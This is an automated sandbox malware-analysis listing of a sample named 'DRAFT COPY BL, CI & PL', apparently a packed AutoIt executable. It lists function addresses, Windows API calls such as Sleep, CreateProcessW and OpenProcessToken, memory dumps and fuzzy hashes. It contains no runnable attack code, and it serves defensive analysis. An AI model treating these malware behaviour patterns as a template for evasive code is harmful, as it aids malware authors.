                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                • String ID:
                                                                • API String ID: 4127811313-0
                                                                • Opcode ID: 8b47fab4a4476928fb3f8a1b3183c04fb366b909e3b79645c385946b8c0114f9
                                                                • Instruction ID: a725f7d8c22fe9a24697ae1726de1a5254c883b5d75e42308e69d27db91cceb3
                                                                • Opcode Fuzzy Hash: 8b47fab4a4476928fb3f8a1b3183c04fb366b909e3b79645c385946b8c0114f9
                                                                • Instruction Fuzzy Hash: 3D113639A10119EFCB10EFA8D9899FF7BB8EB45310F400556FA21E7261C730BA519FA5
                                                                Function 00991142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0098FCED,?,00990D40,?,00008000), ref: 0099115F
                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0098FCED,?,00990D40,?,00008000), ref: 00991184
                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0098FCED,?,00990D40,?,00008000), ref: 0099118E
                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,0098FCED,?,00990D40,?,00008000), ref: 009911C1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CounterPerformanceQuerySleep
                                                                • String ID:
                                                                • API String ID: 2875609808-0
                                                                • Opcode ID: a888f7ae02deca2422a947586bf546f225e1c20e942d966d1d52793160693b7f
                                                                • Instruction ID: 21245caad6821170b39d6d2482a28e3c342d8505b99b7af19b802dc19257cf3d
                                                                • Opcode Fuzzy Hash: a888f7ae02deca2422a947586bf546f225e1c20e942d966d1d52793160693b7f
                                                                • Instruction Fuzzy Hash: CD118E31C0851EEBCF10DFA9D988AEEBB78FF09711F004555EA45B2240CB309550DB91
                                                                Function 0098D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0098D84D
                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0098D864
                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0098D879
                                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0098D897
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                                • String ID:
                                                                • API String ID: 1352324309-0
                                                                • Opcode ID: 46bbd844be28b95659ed67ef42b5a3fc4f0dd1a001bb7409a315c8beb68929ff
                                                                • Instruction ID: dd4a3b5360e39d4c5466969f4f9d45bfa0acbfeb8006f3bd848d0f1ff53897bb
                                                                • Opcode Fuzzy Hash: 46bbd844be28b95659ed67ef42b5a3fc4f0dd1a001bb7409a315c8beb68929ff
                                                                • Instruction Fuzzy Hash: 98116175606304EBE320AF51DD0CF97BBBCEB00B10F108969A516D6290D7B4E549ABA1
                                                                Function 00966FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                • String ID:
                                                                • API String ID: 3016257755-0
                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                • Instruction ID: 21c380c5aaf6e3c68071e84aef3455f051ade9fb8271f1f5ce83c06758645c25
                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                • Instruction Fuzzy Hash: 1E014C7244814ABBCF165FC4CC01CEE7F66BB18398F588455FE5898031D237C9B1ABA1
                                                                Function 009BB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowRect.USER32(?,?), ref: 009BB2E4
                                                                • ScreenToClient.USER32(?,?), ref: 009BB2FC
                                                                • ScreenToClient.USER32(?,?), ref: 009BB320
                                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 009BB33B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                • String ID:
                                                                • API String ID: 357397906-0
                                                                • Opcode ID: 64c7d2ccc6a19de53a4af1cde34b2e0a985c8a288b9ac129d4e1727cc4eb9b79
                                                                • Instruction ID: c46cdfad832672947409c07f931e5e7698c26b8be2febc69d3159f5f28d87da6
                                                                • Opcode Fuzzy Hash: 64c7d2ccc6a19de53a4af1cde34b2e0a985c8a288b9ac129d4e1727cc4eb9b79
                                                                • Instruction Fuzzy Hash: 9A1143B9D0420DEFDB41CFA9C9849EEBBF9FB08310F108166E914E3220D775AA559F50
                                                                Function 009BB635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 009BB644
                                                                • _memset.LIBCMT ref: 009BB653
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009F6F20,009F6F64), ref: 009BB682
                                                                • CloseHandle.KERNEL32 ref: 009BB694
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                • String ID:
                                                                • API String ID: 3277943733-0
                                                                • Opcode ID: 2f606d95e2fd98c221098ba40716c5d2abf5207a2d33b08793440a7ae3ffc3bd
                                                                • Instruction ID: 828772a21d0c8eebee3c11e52378322fa732e2ac556309cbfd5b98ed325936e5
                                                                • Opcode Fuzzy Hash: 2f606d95e2fd98c221098ba40716c5d2abf5207a2d33b08793440a7ae3ffc3bd
                                                                • Instruction Fuzzy Hash: E0F012B2554304BBE3106766BC06FBB7E9CEB097A5F444021FB08E9192D7765C10D7A8
                                                                Function 00996BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?), ref: 00996BE6
                                                                  • Part of subcall function 009976C4: _memset.LIBCMT ref: 009976F9
                                                                • _memmove.LIBCMT ref: 00996C09
                                                                • _memset.LIBCMT ref: 00996C16
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00996C26
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                • String ID:
                                                                • API String ID: 48991266-0
                                                                • Opcode ID: 28acecdd45e7dacf6f0febdee30e16c37767f00498e8ca560b2f282d1030f379
                                                                • Instruction ID: ff6d18785f94881c9f506026662bc766eb31598467e8a5fb68eb1bbb0e14c94a
                                                                • Opcode Fuzzy Hash: 28acecdd45e7dacf6f0febdee30e16c37767f00498e8ca560b2f282d1030f379
                                                                • Instruction Fuzzy Hash: 32F0543A104100BBCF016F95DC85B4ABB29EF85321F048065FE085E267C731E815DBB4
                                                                Function 00932218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSysColor.USER32(00000008), ref: 00932231
                                                                • SetTextColor.GDI32(?,000000FF), ref: 0093223B
                                                                • SetBkMode.GDI32(?,00000001), ref: 00932250
                                                                • GetStockObject.GDI32(00000005), ref: 00932258
                                                                • GetWindowDC.USER32(?,00000000), ref: 0096BE83
                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0096BE90
                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0096BEA9
                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0096BEC2
                                                                • GetPixel.GDI32(00000000,?,?), ref: 0096BEE2
                                                                • ReleaseDC.USER32(?,00000000), ref: 0096BEED
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                • String ID:
                                                                • API String ID: 1946975507-0
                                                                • Opcode ID: 4a37d50b39c40b8d9f9ebb631014f5d133d28f93531e08563418828c31a45afd
                                                                • Instruction ID: b11d07ed21bbe6434082475e8532901c41b3c3033606484e06e57f25241161fc
                                                                • Opcode Fuzzy Hash: 4a37d50b39c40b8d9f9ebb631014f5d133d28f93531e08563418828c31a45afd
                                                                • Instruction Fuzzy Hash: 00E03932118244AADF215FA8ED1D7E83B14EB05336F008366FA69980E197B24990EB12
                                                                Function 00988712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentThread.KERNEL32 ref: 0098871B
                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,009882E6), ref: 00988722
                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009882E6), ref: 0098872F
                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,009882E6), ref: 00988736
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CurrentOpenProcessThreadToken
                                                                • String ID:
                                                                • API String ID: 3974789173-0
                                                                • Opcode ID: f01dc02e420faa28f00c960c9dac5c3cc5127570fdef4d3fff807f33d5749110
                                                                • Instruction ID: 7ee18f415690b391bf0ecb6c1a9dff0d6569cf0f7517e85fb00dcb78a9870aea
                                                                • Opcode Fuzzy Hash: f01dc02e420faa28f00c960c9dac5c3cc5127570fdef4d3fff807f33d5749110
                                                                • Instruction Fuzzy Hash: A7E08636629211ABD7206FB05E0CB5B3BBCEF547E1F144828B245D9050DA348445D760
                                                                Function 0098B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 0098B4BE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ContainedObject
                                                                • String ID: AutoIt3GUI$Container
                                                                • API String ID: 3565006973-3941886329
                                                                • Opcode ID: 8f5b4acd3d70a8f3e831e4ed0372c1e0f4f111ecae3504996127181b37a8733f
                                                                • Instruction ID: 9ab9e9e290d1fab656cfada7575b72fde2ed14d04bb260c9b546d037f82a774b
                                                                • Opcode Fuzzy Hash: 8f5b4acd3d70a8f3e831e4ed0372c1e0f4f111ecae3504996127181b37a8733f
                                                                • Instruction Fuzzy Hash: D1912870600601AFDB14DF65C885B6AB7E9FF49710F28856DF94ACB3A1DB71E841CB50
                                                                Function 0099AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0094FC86: _wcscpy.LIBCMT ref: 0094FCA9
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                • __wcsnicmp.LIBCMT ref: 0099B02D
                                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0099B0F6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                • String ID: LPT
                                                                • API String ID: 3222508074-1350329615
                                                                • Opcode ID: 82a4b04dae4e26757015bab5675a2145b7326d71fc8af104a3fe94db54194109
                                                                • Instruction ID: 07c0b53c783d3127248882c03bd17377c324309b49d3b1c6d1c851e626741a57
                                                                • Opcode Fuzzy Hash: 82a4b04dae4e26757015bab5675a2145b7326d71fc8af104a3fe94db54194109
                                                                • Instruction Fuzzy Hash: 9C618E75A04219EFCF14DF98D991FAEB7B8EF48310F104069F916AB291DB74AE44CB50
                                                                Function 00942957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNEL32(00000000), ref: 00942968
                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00942981
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: GlobalMemorySleepStatus
                                                                • String ID: @
                                                                • API String ID: 2783356886-2766056989
                                                                • Opcode ID: a59cee8e0386ccfd20097630cddec33a19e266a0b3a065e94ce4179bdd93d0dc
                                                                • Instruction ID: ed7216a524b6583d9aae365640e86f4273b37ce8a126b13f302f65a84ddec40f
                                                                • Opcode Fuzzy Hash: a59cee8e0386ccfd20097630cddec33a19e266a0b3a065e94ce4179bdd93d0dc
                                                                • Instruction Fuzzy Hash: 6D5144724187449BD320EF10DC86BAFBBE8FBC5344F81885DF2D8410A1EB709969CB66
                                                                Function 00999734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00934F0B: __fread_nolock.LIBCMT ref: 00934F29
                                                                • _wcscmp.LIBCMT ref: 00999824
                                                                • _wcscmp.LIBCMT ref: 00999837
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _wcscmp$__fread_nolock
                                                                • String ID: FILE
                                                                • API String ID: 4029003684-3121273764
                                                                • Opcode ID: 332c5ed562bee298f4d363d7f94bc93c30ca1c3e20ea4d07093d4eab09becdae
                                                                • Instruction ID: ce71fa33e6c11cc8e1ad3701eb00a76deee6c0156f5ea1a76fd4f567c6df82c4
                                                                • Opcode Fuzzy Hash: 332c5ed562bee298f4d363d7f94bc93c30ca1c3e20ea4d07093d4eab09becdae
                                                                • Instruction Fuzzy Hash: DE41C471A04209BADF219BE9CC45FEFBBBDEFC5714F01046DF904A7181DA71AA058B61
                                                                Function 009A258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 009A259E
                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009A25D4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CrackInternet_memset
                                                                • String ID: |
                                                                • API String ID: 1413715105-2343686810
                                                                • Opcode ID: 946d81b7a82c273f3df639ffeaef0671005acb8a0646b8d62bf667277c44dcb9
                                                                • Instruction ID: 22531c532551eab4b60fa92400d93e3fe4b3f1cf1c274d9bceb5cddc93b6a0f1
                                                                • Opcode Fuzzy Hash: 946d81b7a82c273f3df639ffeaef0671005acb8a0646b8d62bf667277c44dcb9
                                                                • Instruction Fuzzy Hash: 4A3115B1801119ABCF11EFA5CC85EEEBFB9FF49310F10006AF915B6162EA315956DFA0
                                                                Function 009B7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 009B7B61
                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009B7B76
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: '
                                                                • API String ID: 3850602802-1997036262
                                                                • Opcode ID: ad22ea3c8a8c19cc5ec464cd20b634750e362f49ecea1c854ebe80356100cfbc
                                                                • Instruction ID: 7d1bacbce29644e19d1e3969df415333ec4070ca930a732fc9fa426cbfa50e72
                                                                • Opcode Fuzzy Hash: ad22ea3c8a8c19cc5ec464cd20b634750e362f49ecea1c854ebe80356100cfbc
                                                                • Instruction Fuzzy Hash: C0411974A053199FDB54CFA4C981BEABBB9FF48310F11026AE905EB391D770A951CF90
                                                                Function 009B6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DestroyWindow.USER32(?,?,?,?), ref: 009B6B17
                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 009B6B53
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$DestroyMove
                                                                • String ID: static
                                                                • API String ID: 2139405536-2160076837
                                                                • Opcode ID: 0d6d6335734d05870d1dfc5866848014f97683a2ce826d8c09ef2c0f39815b09
                                                                • Instruction ID: ff426f10e1b291819cf478f119e4b07fd2af5b5a4e450e3c3ed8e0f666315124
                                                                • Opcode Fuzzy Hash: 0d6d6335734d05870d1dfc5866848014f97683a2ce826d8c09ef2c0f39815b09
                                                                • Instruction Fuzzy Hash: A1319071110604AEDB109F68CD90BFB73BDFF88760F108619F9A9D7190DA74AC41DB60
                                                                Function 009928A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 00992911
                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0099294C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: InfoItemMenu_memset
